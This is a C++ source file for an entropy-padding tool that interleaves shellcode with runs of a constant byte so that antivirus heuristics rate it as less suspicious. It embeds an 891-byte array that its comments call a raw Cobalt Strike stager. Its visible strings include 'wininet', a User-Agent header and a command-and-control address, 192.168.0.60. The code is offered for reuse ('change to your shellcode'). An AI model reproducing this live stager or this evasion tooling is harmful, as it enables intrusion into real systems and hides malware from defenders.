#include <cstdio>
#include <cstdlib> // rand(); previously only reached transitively through <windows.h>
#include <windows.h>
#include "Entropy.h"
using namespace std;
// ASCII-art banner printed by main(). It is a NUL-terminated string literal, so
// sizeof banner counts the terminator as well as the visible characters.
char banner[] = "\n\n @@@@@@ @@@ @@@ @@@@@@@@ @@@ @@@ @@@@@@@ @@@@@@@ @@@@@@ @@@@@@@ @@@ @@@\n !@@ @@! @@@ @@! @@! @@! @@! @@! @@@ @@! @@@ @@! @@@ @@! !@@\n !@@!! @!@!@!@! @!!!:! @!! @!! @!! @!@!!@! @!@ !@! @!@@!@! !@!@! \n !:! !!: !!! !!: !!: !!: !!: !!: :!! !!: !!! !!: !!: \n ::.: : : : : : :: ::: : ::.: : : ::.: : : : : : : :. : : .: \n\n=============[The more predictable you are, the less you are able to get detected.]====";
// Raw Cobalt Strike stager shellcode (high entropy, 891 bytes). Its cleartext strings are visible in the bytes below ("wininet", a User-Agent header, the C2 address "192.168.0.60"); the padding scheme in shannonEncode() copies every payload byte through unchanged, so these strings and the rest of the shellcode stay signature-able in the output.
BYTE payload[] = { 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc8,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x75,0x72,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4f,0xff,0xff,0xff,0x5d,0x6a,0x00,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x00,0x41,0x56,0x49,0x89,0xe6,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x48,0x31,0xc9,0x48,0x31,0xd2,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x41,0x50,0x41,0x50,0x41,0xba,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x73,0x5a,0x48,0x89,0xc1,0x41,0xb8,0xfb,0x20,0x00,0x00,0x4d,0x31,0xc9,0x41,0x51,0x41,0x51,0x6a,0x03,0x41,0x51,0x41,0xba,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x59,0x5b,0x48,0x89,0xc1,0x48,0x31,0xd2,0x49,0x89,0xd8,0x4d,0x31,0xc9,0x52,0x68,0x00,0x02,0x40,0x84,0x52,0x52,0x41,0xba,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x48,0x83,0xc3,0x50,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0xff,0xff,0xff,0xff,0x4d,0x31,0xc9,0x52,0x52,0x41,0xba,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x0f,0x85,0x9d,0x01,0x00,0x00,0x48,0xff,0xcf,0x0f,0x84,0x8c,0x01,0x00,0x00,0xeb,0xd3,0xe9,0xe4,0x01,0x00,0x00,0xe8,0xa2,0xff,0xff,0xff,0x2f,0x5a,0x68,0x4a,0x51,0x00,0
x14,0xdf,0xc3,0xe6,0x67,0xb2,0x3f,0xf0,0xa4,0x07,0x0b,0xb8,0xd1,0xe4,0xcc,0xcf,0xbe,0x10,0x4a,0xcf,0x53,0x93,0xa1,0x73,0xbe,0x8c,0x7d,0xcc,0xbf,0x2d,0x4a,0x9f,0xe3,0x0c,0x73,0xa5,0xa2,0xc2,0x3c,0xf3,0x9d,0x5f,0x22,0x53,0x6a,0x36,0xc2,0x0d,0x51,0xb2,0x05,0xbb,0xce,0x68,0x1b,0x29,0x3d,0xf4,0xa3,0x82,0xe7,0x2e,0xb5,0x51,0x02,0x85,0xe9,0x9e,0xa9,0xd9,0x0b,0x50,0x81,0x00,0x55,0x73,0x65,0x72,0x2d,0x41,0x67,0x65,0x6e,0x74,0x3a,0x20,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x34,0x2e,0x30,0x20,0x28,0x63,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x6c,0x65,0x3b,0x20,0x4d,0x53,0x49,0x45,0x20,0x38,0x2e,0x30,0x3b,0x20,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x35,0x2e,0x31,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x34,0x2e,0x30,0x3b,0x20,0x47,0x54,0x42,0x37,0x2e,0x34,0x3b,0x20,0x49,0x6e,0x66,0x6f,0x50,0x61,0x74,0x68,0x2e,0x32,0x29,0x0d,0x0a,0x00,0xb3,0xf4,0xdf,0xb0,0x7e,0x71,0x50,0x93,0x5d,0xd1,0xf9,0x31,0xc6,0x13,0x25,0x49,0x7c,0x07,0xc9,0x28,0x2f,0x65,0xc3,0x82,0x61,0x10,0x1b,0x8b,0x19,0x4a,0x0a,0xd0,0x86,0x2c,0x51,0xcd,0x33,0xc5,0xca,0xb7,0x61,0x89,0xe7,0x8a,0x38,0xb0,0x01,0x48,0xdb,0x48,0x78,0x33,0x80,0xaa,0xea,0x71,0xb2,0x5f,0x73,0x90,0x95,0x52,0x48,0x28,0xd2,0x65,0xf4,0x71,0x97,0x73,0xb6,0x49,0x10,0x2b,0xf4,0xd7,0xe0,0xc0,0xc0,0x09,0x0d,0x9a,0x17,0x1f,0x49,0xe3,0x52,0x4a,0x03,0xb8,0xcc,0x8b,0x72,0x0b,0x5f,0x7d,0x65,0xc8,0x44,0xf0,0x4f,0xe3,0x8b,0x69,0xcb,0xe8,0xee,0xeb,0xc3,0x50,0x95,0x4d,0xdd,0x37,0x49,0xd0,0x0b,0x81,0x2a,0xe6,0x53,0xeb,0x9d,0x49,0x97,0x73,0xcc,0x9f,0xec,0xa3,0x3d,0x3e,0x69,0xc4,0x22,0x28,0x3a,0x5a,0xc1,0x3a,0x24,0xa8,0xda,0x33,0x29,0x0d,0x88,0xd4,0x8e,0x36,0x24,0x4a,0x54,0x2b,0x04,0x8d,0x26,0x46,0xbc,0x85,0x4e,0x1c,0x98,0xb5,0x71,0xed,0xef,0x54,0xeb,0xca,0x1e,0xa5,0x64,0xba,0x51,0x48,0x5c,0x26,0x71,0x65,0xd5,0x39,0x99,0x6e,0x56,0x8e,0xf0,0x74,0xd6,0x4f,0x93,0xb0,0x26,0x64,0x82,0xfc,0x0f,0x09,0xf2,0xd7,0x70,0x0e,0xee,0x06,0xb3,0x00,0x41,0xbe,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x31,0xc9,0xba,0x00,0x00,0x40,0x00,0x41,0xb8,0x00,0x10,0x00,0x00,0
x41,0xb9,0x40,0x00,0x00,0x00,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x41,0xb8,0x00,0x20,0x00,0x00,0x49,0x89,0xf9,0x41,0xba,0x12,0x96,0x89,0xe2,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb6,0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd7,0x58,0x58,0x58,0x48,0x05,0x00,0x00,0x00,0x00,0x50,0xc3,0xe8,0x9f,0xfd,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x30,0x2e,0x36,0x30,0x00,0x5e,0x2e,0x78,0x90 }; //change to your shellcode
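// Number of equal-size chunks the raw payload is split into; after every
// chunk a run of chunk_size identical pad bytes is inserted by shannonEncode().
constexpr int number_of_chunks = 5; //change the number to your needs (optional)
static_assert(number_of_chunks > 0, "number_of_chunks must be positive");
// Payload bytes per chunk (integer division). Bytes that do not fill a whole
// chunk are appended unpadded at the end of the output.
constexpr int chunk_size = sizeof payload / number_of_chunks;
// A zero-size chunk would make the per-chunk loops no-ops and the encoder
// useless; fail at compile time instead of silently emitting padding only.
static_assert(chunk_size > 0, "payload is smaller than number_of_chunks bytes; reduce number_of_chunks");
constexpr int remaining_bytes = sizeof payload % number_of_chunks;
// Output buffer. Size: number_of_chunks * (chunk_size payload + chunk_size pad)
// plus the remaining_bytes tail, which equals 2 * sizeof payload - remaining_bytes.
BYTE lowEntropyShellcode[sizeof payload * 2 - remaining_bytes] = { 0 };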
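// Lowers the Shannon entropy of the payload by interleaving it with runs of a
// constant pad byte: after each of the number_of_chunks chunks of chunk_size
// payload bytes, chunk_size copies of one pad byte are written, and the
// remaining_bytes tail that does not fill a chunk is appended unpadded.
//
// Despite the name this is not Shannon-Fano coding, and it is not obfuscation:
// every payload byte is copied through unchanged (only padding is added), so
// strings, API hashes and any other static signature in the shellcode remain
// intact and contiguous-per-chunk in the output.
//
// rawShellcode: must point to at least sizeof payload bytes. The length is
//               taken from the file-scope constants, not from the argument.
// Returns a pointer to the file-scope lowEntropyShellcode buffer
// (sizeof lowEntropyShellcode bytes); it is overwritten on every call.
// Side effect: prints the encoded bytes to stdout as a C array initializer.
PBYTE shannonEncode(const BYTE* rawShellcode)
{
    // Pad byte drawn from [min_n, max_n]. rand() is never seeded in this file,
    // so the same value is chosen on every run; it is cosmetic, not a secret.
    constexpr int max_n = 0xEF; //239
    constexpr int min_n = 0x01; //1
    const BYTE pad = static_cast<BYTE>(rand() % (max_n + 1 - min_n) + min_n);

    size_t out = 0; // next write position in lowEntropyShellcode
    size_t in = 0;  // next read position in rawShellcode

    for (int chunk = 0; chunk < number_of_chunks; chunk++)
    {
        for (int j = 0; j < chunk_size; j++)
        {
            lowEntropyShellcode[out++] = rawShellcode[in++];
        }
        for (int j = 0; j < chunk_size; j++)
        {
            lowEntropyShellcode[out++] = pad;
        }
    }

    // Tail: exactly remaining_bytes bytes. The original loop used
    // `sizeof remaining_bytes` (i.e. sizeof(int)), which read past the end of
    // the payload and wrote past the end of lowEntropyShellcode whenever the
    // remainder was not 4.
    for (int j = 0; j < remaining_bytes; j++)
    {
        lowEntropyShellcode[out++] = rawShellcode[in++];
    }

    for (size_t count = 0; count < sizeof lowEntropyShellcode; count++) {
        printf("0x%02X,", lowEntropyShellcode[count]);
    }
    return lowEntropyShellcode;
}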
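// Prints the banner, pads the embedded payload with shannonEncode(), and
// reports the Shannon entropy of the original and of the padded array.
int main() {
    // Print the banner as a string. The previous character loop ran for
    // sizeof(banner) iterations and therefore also emitted the terminating NUL.
    fputs(banner, stdout);
    // Name kept for output compatibility; the scheme is entropy padding, not
    // Shannon-Fano coding (see shannonEncode).
    printf("\n\n\nShannon Fano Encoded shellcode:\n\n");
    // shannonEncode fills and returns the file-scope lowEntropyShellcode buffer,
    // so the entropy is measured on it directly. The earlier stack copy via
    // memcpy_s (MSVC-only) was redundant.
    PBYTE encoded = shannonEncode(payload);
    const auto encodedArray = calculate_entropy(reinterpret_cast<char*>(encoded), sizeof lowEntropyShellcode);
    const auto normalShellcode = calculate_entropy(reinterpret_cast<char*>(payload), sizeof payload);
    printf("\n\n---------------\nOriginal array Entropy is: %f\r\n", normalShellcode);
    printf("Processed array Entropy is: %f\r\n", encodedArray);
    return 0;
}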